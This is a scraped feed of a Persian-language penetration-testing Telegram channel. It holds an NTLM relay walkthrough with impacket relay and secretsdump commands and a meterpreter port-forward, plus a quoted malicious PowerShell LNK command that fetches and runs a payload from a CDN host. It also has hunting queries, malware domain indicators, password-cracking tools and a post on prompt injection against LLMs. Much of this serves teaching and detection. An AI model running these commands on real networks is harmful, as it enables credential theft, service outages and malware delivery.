Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
🔖 اصل قضیه: Remote NTLM Relay

امروز می‌ خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به‌ خاطر ویژگی‌ های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.

اینجا حرف از Remote NTLM Relay هست: حمله‌ای که با متوقف‌سازی اجباری سرویس‌ های SMB روی سرور و راه‌اندازی مجدد اون‌ ها کار میکنه، به‌طوری که ترافیک واردشون روی پورت 445 پس از ری‌ استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن‌ های ورودی رو به هر جایی که می‌خواد رله کنه.

برای exploiting باید چند مرحله ساده رو انجام بدیم.

💢 مرحله 1 > آماده‌ سازی سرور

برای آماده‌ سازی سرور جهت exploiting، باید سرویس‌ های SMB رو غیرفعال و سرور رو ری‌ استارت کنیم. مراحل به‌ صورت کلی اینه:

1. غیرفعال‌سازی NetLogon:
   sc stop netlogon

2. غیرفعال و متوقف‌کردن SMB Server (LanManServer):
   sc stop lanmanserver
sc config lanmanserver start= disabled

3. توقف کامل LanManWorkstation:
   sc stop lanmanworkstation
sc config lanmanworkstation start= disabled

این مراحل توی اسکرین‌ شات اول قابل مشاهده‌ست.
بعد از غیرفعالسازی سرویس‌ها باید ماشین رو ری‌ استارت کنیم (shutdown /r /t 0) خیلی مهمه که دستگاه ری‌ استارت بشه نه اینکه خاموش بشه.
پس از بوت شدن مجدد و به‌دست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، می‌تونیم به مرحله بعد بریم.

💢 مرحله 2 > تنظیم ماشین مهاجم

روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده می‌کنیم. در مثالی که من اجرا کردم، هدف سرور 10.201.126.30 بود (چون برای این هدف SMB نیازی به signing نداشت). پراکسی‌ ای که استفاده میکنیم روی پورت 1090 listening میکنه، بنابراین دستور اجرا شبیه اینه:
proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090

💢 مرحله 3 > TCP relay با meterpreter

با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت 445/TCP روی سرور رو به ماشین مهاجم (که رله رو انجام می‌ده) فوروارد/ریدایرکت می‌ کنیم. مثال دستور:
portfwd add -R -L 10.51.124.39 -l 445 -p 445

اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می‌ بینید.

💢 مرحله 4 > Post-exploitation

بعد از اینکه رله موفق باشه، ntlmrelayx.py معمولاً سشن رو باز نگه میداره؛ بنابراین با ساخت یک کانفیگ سفارشی برای proxychains می‌ تونیم از ابزارهای دیگهٔ Impacket-like برای کارهای post-exploitation استفاده کنیم.
در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی‌ ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامه‌ها و lateral movement در دامنه استفاده کنیم:
proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/SRV-ADMIN@10.201.126.30

چرا این وکتور کمتر رایجه؟

دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:

غیرفعال‌کردن سرویس‌ های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط‌ های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.

@TryHackBox
#AD #NTLM #Attack
🔥41
Forwarded from TryHackBox
AI Cybersecurity Careers.pdf
970.3 KB
مشاغل امنیت سایبری هوش مصنوعی

@TryHackBoxOfficial | Github | YouTube | Group
#AI #SANS #THB
2
Secure and insecure ports

⚠️ پورت‌های ناامن (ارسال داده بدون رمزنگاری)
پورت‌های امن (با رمزنگاری)
-> پورت هایی که نام برده شده به صورت گسترده در حال استفاده اند و دانستن آنها میتواند شبکه شما را امن تر کند یا تست نفوذ شما را سریع تر به عمل برساند

✍️نویسنده
@TryHackBox | The Chaos
#CyberSecurity #Network #Ports
👍7
PASSWORD CRACKING TOOLS

🔐 سری ابزار های مفید برای شکستن پسورد ها (با هدف بررسی میزان امنیت آنها)

✍️نویسنده
@TryHackBox | The Chaos
👍4
Try Hack Box
PASSWORD CRACKING TOOLS 🔐 سری ابزار های مفید برای شکستن پسورد ها (با هدف بررسی میزان امنیت آنها) ✍️نویسنده @TryHackBox | The Chaos
🔑 ابزارهای امنیت رمزعبور - راهنمای آگاهی و دفاع 🛡

رمزعبورهای ضعیف و تکراری همچنان یکی از بزرگ‌ترین ریسک‌های امنیتی هستند! محققان امنیتی و تسترهای نفوذ در محیط‌های آزمایشگاهی و تست‌های مجاز از این ابزارها برای شناسایی آسیب‌پذیری‌ها استفاده می‌کنند.

🛠 ابزارهای رایج:
• John the Ripper
ابزار کلاسیک تست رمزعبور برای فرمت‌های مختلف
• RainbowCrack
استفاده از جدول رنگین‌کمان برای کرک سریع
• Wfuzz
فاز کردن برای پیدا کردن مسیرها و پارامترهای پنهان
• Cain & Abel
مجموعه ابزار بازیابی رمزعبور ویندوز (نسخه لگاسی)
• THC Hydra
تستر رمزعبور لاگین شبکه (SSH, FTP, RDP, HTTP)
• Medusa
تستر موازی و ماژولار رمزعبور
• OphCrack
ابزار کرک رمزعبور با استفاده از جدول رنگین‌کمان
• L@phtCrack
ابزار قدیمی اما قدرتمند تست رمزعبور
• Aircrack-ng
مجموعه ابزار امنیت شبکه‌های Wi-Fi
• Brutus
ابزار تست رمزعبور از راه دور

🛡 راهکارهای دفاعی:
اجرای سیاست‌های قوی رمزعبور
(طول مناسب، پیچیدگی، یکتایی)

فعال‌سازی احراز هویت دو مرحله‌ای (MFA/2FA)

حسابرسی منظم اعتبارنامه‌ها و حذف اکانت‌های قدیمی

استفاده از مدیران رمزعبور برای کاهش استفاده تکراری

مانیتورینگ نشت اطلاعات در فیدهای تهدیدات سایبری

✍️نویسنده
@TryHackBox | The Chaos
#PasswordSecurity #CyberSecurity #EthicalHacking
👍5
Part_I_Prompt_Injection_–_Exploiting_LLM_Instruction_Confusion_THB.pdf
421.4 KB
بخش اول: تزریق پرامپت Exploiting  از سردرگمی دستورات LLM

تزریق پرامپت یک نقص اساسی در مدل‌های زبان بزرگ امروزی (LLMs) را نشان می‌دهد که ریشه در ناتوانی آن‌ها در تشخیص قابل اعتماد بین داده‌ها و دستورات اجرایی دارد. بر خلاف نرم‌افزارهای کلاسیک که به وضوح کد را از داده‌ها جدا می‌کنند، LLMها به همه ورودی‌ها به عنوان دستورات بالقوه یکسان نگاه می‌کنند.

@TryHackBox | Github | YouTube | Group
#Prompt_injection #exploiting
3
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :

💠 کانال های تلگرام ما

🔶 آموزش تست نفوذ و Red Team
🆔
@TryHackBox

🔶 رودمپ های مختلف
🆔
@TryHackBoxOfficial

🔶 داستان های هک
🆔
@TryHackBoxStory

🔶 آموزش برنامه نویسی
🆔
@TryCodeBox

🔶 رادیو زیروپاد ( پادکست ها )
🆔
@RadioZeroPod


👥 گروه های پرسش و پاسخ

🔷 هک و امنیت
🆔
@TryHackBoxGroup
🔷 برنامه نویسی
🆔
@TryCodeBoxGroup


🔴 اینستاگرام :
🔗
http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗
https://youtube.com/@tryhackbox

🟠 گیت هاب ما :
🔗
https://github.com/TryHackBox/
بیایید بیشتر در مورد APT حرف بزنیم.pdf
641.9 KB
🔖 بیایید بیشتر در مورد APT حرف بزنیم.

@TryHackBox | Github | YouTube | Group
#APT #Hackers
4
🔖 SDDL | اشک‌هاتو برای یه روز دیگه نگه دار

💢 بخش اول

📃 چند بار چشمای خودتون رو خسته کردید تا ACL تو ویندوز رو بفهمید؟ مثلاً این رشته:

O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x3;;;BO)(A;;0x5;;;SO)(A;;0x1;;;IU)(A;;0x3;;;SU)(A;;0x1;;;S-1-5-3)(A;;0x2;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)

به این معنیه:

1️⃣ O:BA
- مالک (Owner): "مدیران داخلی" (Built-in Administrators)
2️⃣ G:SY
- گروه (Group): "سیستم محلی" (Local System)
3️⃣ Last part
DACL (Discretionary Access Control List)

بیاید یه بخش از DACL رو رمزگشایی کنیم:

(A;;0x7;;;BA)
- دسترسی مجاز (ACCESS ALLOWED) برای "مدیران داخلی" (Built-in Administrators) برای ایجاد دایرکتوری‌ها، لیست کردن دایرکتوری و نوشتن داده.

@TryHackBox
#Windows #SDDL
4👍2
🔖 SDDL  | اشک‌هاتو برای یه روز دیگه نگه دار

بخش دوم

(برای عمیق ترشدن تو فرمت SDDL، این
پست رو ببینید: لینک)

اگه حرفه‌ای تو فهمیدن SDDL نیستید، کافیه از cmdlet ConvertFrom-SddlString استفاده کنید که از PowerShell 5.0 معرفی شده. می‌تونید بخش سخت DACL رو این‌جوری گسترش بدید:
ConvertFrom-SddlString "O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)" | Select -Expand DiscretionaryAcl

اگه از PowerShell متنفرید، از این ابزارها استفاده کنید:

https://github.com/advancedmonitoring/SDDLViewer
https://github.com/zacateras/sddl-parser

@TryHackBox
#Windows #SDDL
3👍1
بازیابی_رمزهای_عبور_از_ترافیک_Kerberos_کپچر_شده.pdf
894.4 KB
💢 بازیابی رمزهای عبور از ترافیک Kerberos کپچر شده

یه یادداشت یهویی که می‌ تونه به شما کمک کنه بدون نیاز به تعامل با کنترلر دامنه (Domain Controller)، به‌صورت مخفیانه اطلاعات کاربری یه کاربر دامنه رو به دست بیارید!


📃 مقاله ما راجب Kerberos

@TryHackBox | Github | YouTube | Group
#Kerberos #Password
👍4
📃 طبق این گزارش مهاجم از یه فایل LNK مخرب برای اجرای یه دستور مخفی PowerShell استفاده کرده که یه سند PDF جعلی (lure) و یه فایل ZIP دیگه رو از آدرس Bunny CDN دانلود میکنه:
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b-cdn[.]net/Marriott_Marketing_Job_Denoscription.pdf' -OutFile 'C:\Users\Public\Marriott.pdf'; Start-Process 'C:\Users\Public\Marriott.pdf'; Start-Sleep -Seconds 3; iwr 'hxxps://555555cnd.b-cdn[.]net/002.zip' -OutFile 'C:\Users\Public\002.zip'; Expand-Archive -Path 'C:\Users\Public\002.zip' -DestinationPath 'C:\Users\Public' -Force; Start-Process 'C:\Users\Public\XtraViewer.exe' -ArgumentList '/silent_start' } catch {}"

با وجود اینکه این دستور خیلی رایجه و به‌راحتی میشه کشفش کرد، استفاده از Bunny CDN جالب به نظر میرسه. و البته، ما میتونیم ازش برای شکار (hunting) استفاده کنیم:
event_type: "dnsreqwin"

AND

dns_rname: "b-cdn.net"

@TryHackBox
#LNKMalware #PowerShell #Malicious
5
در برخی موارد، مهاجمان از پسوندهای دامنه‌ی غیرمعمول و خاص برای زیرساخت‌های خود استفاده می‌کنند. بیایید به یک نمونه‌ی اخیر که مربوط به بدافزار Rhadamanthys است نگاهی بیندازیم. بیشتر دامنه‌ها دارای پسوندهایی هستند که بسیار مشکوک به نظر می‌رسند، مانند:

cloud341[.]autos
cloud341[.]baby
cloud341[.]icu
cloud341[.]lol
cloud341[.]monster
cloud34221[.]hair
cloud34221[.]homes
cloud34221[.]quest
cloud343[.]boats
cloud9342[.]beauty


ارزشش را دارد که برای این مورد یک کوئری هانتر بنویسیم، نه؟

event_type: "dnsreqwin"

AND

dns_rname: (*.autos OR *.baby OR *.icu OR *.lol OR *.monster OR *.hair OR *.homes OR *.quest OR *.boats OR *.beauty)

@TryHackBox
6
#redteam #security

🔐 Weakpass
— یکی از بزرگ‌ترین مجموعه‌ های دیکشنری‌ های پسورد برای اهداف مختلف: از تست نفوذ تا افزایش امنیت پسوردها.

از ویژگی‌های جدید موجود می‌توان به موارد زیر اشاره کرد:

• API
برای ساده‌سازی استفاده از سرویس.
• دیکشنری‌های پیش‌محاسبه شده برای MD5، NTLM، SHA1 و SHA256.
• امکان جستجو بر اساس هش‌های MD5، NTLM، SHA1 و SHA256.
• قابلیت تولید پسورد.
https://weakpass.com/
@TryHackBox
4👌3
Sickle
یک فریمورک برای توسعه پیلود است.

اگرچه ماژول‌ های فعلی این ابزار عمدتاً روی اسمبلی (ساختن باینری) متمرکز هستند، اما محدود به فقط شِلکد (Shellcode) نیست.

در حال حاضر Sickle می‌تواند در موارد زیر کمک کند:
⦁  تبدیل دستورهای اسمبلی به کد ماشین (اپکدها)
⦁  اجرای بایت‌کدها، شامل پیلودهای تولید شده
⦁  فرمت‌بندی opcodes برای زبان‌ های برنامه‌ نویسی تارگت
⦁  شناسایی کاراکترهای نامجاز (bad characters)
⦁  انجام دیس‌ اسمبلی خطی
⦁  مقایسه تفاوت‌ها بین نسخه‌ های مختلف کد

گیت هاب
@TryHackBox
8